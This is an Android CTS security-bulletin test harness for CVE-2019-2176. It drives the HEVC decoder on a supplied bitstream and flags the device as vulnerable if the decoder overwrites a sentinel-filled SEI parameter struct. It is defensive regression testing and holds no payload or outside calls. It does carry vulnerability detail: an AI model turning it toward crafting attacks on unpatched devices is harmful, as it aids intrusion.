Google Git
Sign in
android / platform / cts / b9a1e53ede3e55e976bd01632e2c8f9cffef888d / . / hostsidetests / securitybulletin / securityPatch / CVE-2019-2176 / poc.cpp
blob: 253ace8c5e40fad1750a298a49f72868244c7ec3 [file] [log] [blame]
/*
* Copyright (C) 2020 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <iostream>
#include <fstream>
#include "ihevc_typedefs.h"
#include "ihevcd_cxa.h"
#include "ihevc_defs.h"
#include "ihevcd_defs.h"
#include "ihevcd_function_selector.h"
#include "ihevc_structs.h"
#include "ihevc_cabac_tables.h"
#include "ihevcd_structs.h"
#include "../includes/common.h"
#define NUM_CORES 3
#define COLOR_FORMAT IV_YUV_420SP_UV
#define DEFAULT_WIDTH 1920
#define DEFAULT_HEIGHT 1088
#define NUM_OUTPUT_BUFFERS 2
#define MEM_ALIGNMENT 16
#define MAX_WIDTH 10240
#define MAX_HEIGHT 10240
#define SKIP_BYTES 4
#define INITIAL_VAL (0xBE)
#define INITIAL_VAL_32 (0xBEBEBEBE)
void *iv_aligned_malloc(void *ctxt, WORD32 alignment, WORD32 size) {
void *buf = nullptr;
(void) ctxt;
if (0 != posix_memalign(&buf, alignment, size)) {
return nullptr;
}
return buf;
}
void iv_aligned_free(void *ctxt, void *buf) {
(void) ctxt;
free(buf);
}
class Codec {
public:
Codec(IV_COLOR_FORMAT_T colorFormat, size_t numCores);
~Codec();
IV_API_CALL_STATUS_T createCodec();
void deleteCodec();
void resetCodec();
void setCores();
void allocFrame();
void freeFrame();
void decodeHeader(const uint8_t *data, size_t size);
void decodeFrame(const uint8_t *data, size_t size,
size_t *bytesConsumed, bool *isVulnerable);
void setParams(IVD_VIDEO_DECODE_MODE_T mode);
private:
IV_COLOR_FORMAT_T mColorFormat;
size_t mNumCores;
iv_obj_t *mCodec;
ivd_out_bufdesc_t mOutBufHandle;
uint32_t mWidth;
uint32_t mHeight;
};
Codec::Codec(IV_COLOR_FORMAT_T colorFormat, size_t numCores) {
mColorFormat = colorFormat;
mNumCores = numCores;
mCodec = nullptr;
mWidth = 0;
mHeight = 0;
memset(&mOutBufHandle, 0, sizeof(mOutBufHandle));
}
Codec::~Codec() {
}
IV_API_CALL_STATUS_T Codec::createCodec() {
IV_API_CALL_STATUS_T ret;
ihevcd_cxa_create_ip_t create_ip;
ihevcd_cxa_create_op_t create_op;
void *fxns = (void *) &ihevcd_cxa_api_function;
create_ip.s_ivd_create_ip_t.e_cmd = IVD_CMD_CREATE;
create_ip.s_ivd_create_ip_t.u4_share_disp_buf = 0;
create_ip.s_ivd_create_ip_t.e_output_format = mColorFormat;
create_ip.s_ivd_create_ip_t.pf_aligned_alloc = iv_aligned_malloc;
create_ip.s_ivd_create_ip_t.pf_aligned_free = iv_aligned_free;
create_ip.s_ivd_create_ip_t.pv_mem_ctxt = nullptr;
create_ip.s_ivd_create_ip_t.u4_size = sizeof(ihevcd_cxa_create_ip_t);
create_op.s_ivd_create_op_t.u4_size = sizeof(ihevcd_cxa_create_op_t);
ret = ihevcd_cxa_api_function(nullptr, (void *)&create_ip,
(void *)&create_op);
if (ret != IV_SUCCESS) {
return ret;
}
mCodec = (iv_obj_t *) create_op.s_ivd_create_op_t.pv_handle;
mCodec->pv_fxns = fxns;
mCodec->u4_size = sizeof(iv_obj_t);
return ret;
}
void Codec::deleteCodec() {
ivd_delete_ip_t delete_ip;
ivd_delete_op_t delete_op;
delete_ip.e_cmd = IVD_CMD_DELETE;
delete_ip.u4_size = sizeof(ivd_delete_ip_t);
delete_op.u4_size = sizeof(ivd_delete_op_t);
ihevcd_cxa_api_function(mCodec, (void *)&delete_ip, (void *)&delete_op);
}
void Codec::resetCodec() {
ivd_ctl_reset_ip_t s_ctl_ip;
ivd_ctl_reset_op_t s_ctl_op;
s_ctl_ip.e_cmd = IVD_CMD_VIDEO_CTL;
s_ctl_ip.e_sub_cmd = IVD_CMD_CTL_RESET;
s_ctl_ip.u4_size = sizeof(ivd_ctl_reset_ip_t);
s_ctl_op.u4_size = sizeof(ivd_ctl_reset_op_t);
ihevcd_cxa_api_function(mCodec, (void *)&s_ctl_ip, (void *)&s_ctl_op);
}
void Codec::setCores() {
ihevcd_cxa_ctl_set_num_cores_ip_t s_ctl_ip;
ihevcd_cxa_ctl_set_num_cores_op_t s_ctl_op;
s_ctl_ip.e_cmd = IVD_CMD_VIDEO_CTL;
s_ctl_ip.e_sub_cmd =
(IVD_CONTROL_API_COMMAND_TYPE_T) IHEVCD_CXA_CMD_CTL_SET_NUM_CORES;
s_ctl_ip.u4_num_cores = mNumCores;
s_ctl_ip.u4_size = sizeof(ihevcd_cxa_ctl_set_num_cores_ip_t);
s_ctl_op.u4_size = sizeof(ihevcd_cxa_ctl_set_num_cores_op_t);
ihevcd_cxa_api_function(mCodec, (void *)&s_ctl_ip, (void *)&s_ctl_op);
}
void Codec::setParams(IVD_VIDEO_DECODE_MODE_T mode) {
ivd_ctl_set_config_ip_t s_ctl_ip;
ivd_ctl_set_config_op_t s_ctl_op;
s_ctl_ip.u4_disp_wd = 0;
s_ctl_ip.e_frm_skip_mode = IVD_SKIP_NONE;
s_ctl_ip.e_frm_out_mode = IVD_DISPLAY_FRAME_OUT;
s_ctl_ip.e_vid_dec_mode = mode;
s_ctl_ip.e_cmd = IVD_CMD_VIDEO_CTL;
s_ctl_ip.e_sub_cmd = IVD_CMD_CTL_SETPARAMS;
s_ctl_ip.u4_size = sizeof(ivd_ctl_set_config_ip_t);
s_ctl_op.u4_size = sizeof(ivd_ctl_set_config_op_t);
ihevcd_cxa_api_function(mCodec, (void *)&s_ctl_ip, (void *)&s_ctl_op);
}
void Codec::freeFrame() {
for (size_t i = 0; i < mOutBufHandle.u4_num_bufs; i++) {
if (mOutBufHandle.pu1_bufs[i]) {
free(mOutBufHandle.pu1_bufs[i]);
mOutBufHandle.pu1_bufs[i] = nullptr;
}
}
}
void Codec::allocFrame() {
size_t sizes[2];
sizes[0] = mWidth * mHeight;
sizes[1] = mWidth * mHeight >> 1;
size_t num_bufs = NUM_OUTPUT_BUFFERS;
freeFrame();
memset(&mOutBufHandle, 0, sizeof(mOutBufHandle));
mOutBufHandle.u4_num_bufs = num_bufs;
for (size_t i = 0; i < num_bufs; i++) {
mOutBufHandle.u4_min_out_buf_size[i] = sizes[i];
mOutBufHandle.pu1_bufs[i] = (UWORD8 *) iv_aligned_malloc(nullptr,
MEM_ALIGNMENT,
sizes[i]);
}
}
void Codec::decodeHeader(const uint8_t *data, size_t size) {
setParams (IVD_DECODE_HEADER);
while (size > 0) {
ivd_video_decode_ip_t dec_ip;
ivd_video_decode_op_t dec_op;
size_t bytes_consumed;
memset(&dec_ip, 0, sizeof(dec_ip));
memset(&dec_op, 0, sizeof(dec_op));
dec_ip.e_cmd = IVD_CMD_VIDEO_DECODE;
dec_ip.u4_ts = 0;
dec_ip.pv_stream_buffer = (void *) data;
dec_ip.u4_num_Bytes = size;
dec_ip.u4_size = sizeof(ivd_video_decode_ip_t);
dec_op.u4_size = sizeof(ivd_video_decode_op_t);
ihevcd_cxa_api_function(mCodec, (void *)&dec_ip,
(void *)&dec_op);
bytes_consumed = dec_op.u4_num_bytes_consumed;
if (!bytes_consumed)
bytes_consumed = SKIP_BYTES;
bytes_consumed = std::min(size, bytes_consumed);
data += bytes_consumed;
size -= bytes_consumed;
mWidth = std::min(dec_op.u4_pic_wd, (UWORD32) MAX_WIDTH);
mHeight = std::min(dec_op.u4_pic_ht, (UWORD32) MAX_HEIGHT);
/* Break after successful header decode */
if (mWidth && mHeight) {
break;
}
}
/* if width / height are invalid, set them to defaults */
if (!mWidth)
mWidth = DEFAULT_WIDTH;
if (!mHeight)
mHeight = DEFAULT_HEIGHT;
}
void Codec::decodeFrame(const uint8_t *data, size_t size,
size_t *bytesConsumed,
bool* isVulnerable) {
ivd_video_decode_ip_t dec_ip;
ivd_video_decode_op_t dec_op;
memset(&dec_ip, 0, sizeof(dec_ip));
memset(&dec_op, 0, sizeof(dec_op));
dec_ip.e_cmd = IVD_CMD_VIDEO_DECODE;
dec_ip.u4_ts = 0;
dec_ip.pv_stream_buffer = (void *) data;
dec_ip.u4_num_Bytes = size;
dec_ip.u4_size = sizeof(ivd_video_decode_ip_t);
dec_ip.s_out_buffer = mOutBufHandle;
dec_op.u4_size = sizeof(ivd_video_decode_op_t);
*isVulnerable = false;
codec_t * ps_codec = (codec_t *) mCodec->pv_codec_handle;
parse_ctxt_t *ps_parse = &ps_codec->s_parse;
buf_period_sei_params_t *ps_buf_period_sei_params;
ps_buf_period_sei_params = &ps_parse->s_sei_params.s_buf_period_sei_params;
memset((void *) ps_buf_period_sei_params, INITIAL_VAL,
sizeof(buf_period_sei_params_t));
ihevcd_cxa_api_function(mCodec, (void *)&dec_ip, (void *)&dec_op);
UWORD32 len = ps_buf_period_sei_params->u4_initial_cpb_removal_delay_length;
if (len != INITIAL_VAL_32) {
*isVulnerable = true;
}
/* In case of change in resolution, reset codec and feed the same data again
*/
if ((dec_op.u4_error_code & 0xFF) == IVD_RES_CHANGED) {
resetCodec();
ihevcd_cxa_api_function(mCodec, (void *)&dec_ip, (void *)&dec_op);
}
*bytesConsumed = dec_op.u4_num_bytes_consumed;
/* If no bytes are consumed, then consume 4 bytes to ensure fuzzer proceeds
* to feed next data */
if (!*bytesConsumed)
*bytesConsumed = SKIP_BYTES;
if (dec_op.u4_pic_wd && dec_op.u4_pic_ht
&& (mWidth != dec_op.u4_pic_wd || mHeight != dec_op.u4_pic_ht)) {
mWidth = std::min(dec_op.u4_pic_wd, (UWORD32) MAX_WIDTH);
mHeight = std::min(dec_op.u4_pic_ht, (UWORD32) MAX_HEIGHT);
allocFrame();
}
}
int main(int argc, char **argv) {
if (argc != 2) {
return EXIT_FAILURE;
}
std::ifstream inFile(argv[1]);
if (!inFile) {
return EXIT_FAILURE;
}
inFile.seekg(0, inFile.end);
size_t size = inFile.tellg();
if (size < 1) {
inFile.close();
return EXIT_FAILURE;
}
inFile.seekg(0, inFile.beg);
uint8_t *data = new uint8_t[size];
inFile.read(reinterpret_cast<char *>(data), size);
IV_COLOR_FORMAT_T colorFormat = COLOR_FORMAT;
uint32_t numCores = NUM_CORES;
bool isVulnerable = false;
Codec *codec = new Codec(colorFormat, numCores);
IV_API_CALL_STATUS_T ret = codec->createCodec();
if(ret != IV_SUCCESS){
inFile.close();
delete codec;
delete[] data;
return EXIT_FAILURE;
}
codec->setCores();
codec->decodeHeader(data, size);
codec->setParams(IVD_DECODE_FRAME);
codec->allocFrame();
while (size > 0) {
size_t bytesConsumed;
codec->decodeFrame(data, size, &bytesConsumed, &isVulnerable);
bytesConsumed = std::min(size, bytesConsumed);
data += bytesConsumed;
size -= bytesConsumed;
}
codec->freeFrame();
codec->deleteCodec();
inFile.close();
delete codec;
delete[] data;
if (isVulnerable) {
return EXIT_VULNERABLE;
}
return EXIT_SUCCESS;
}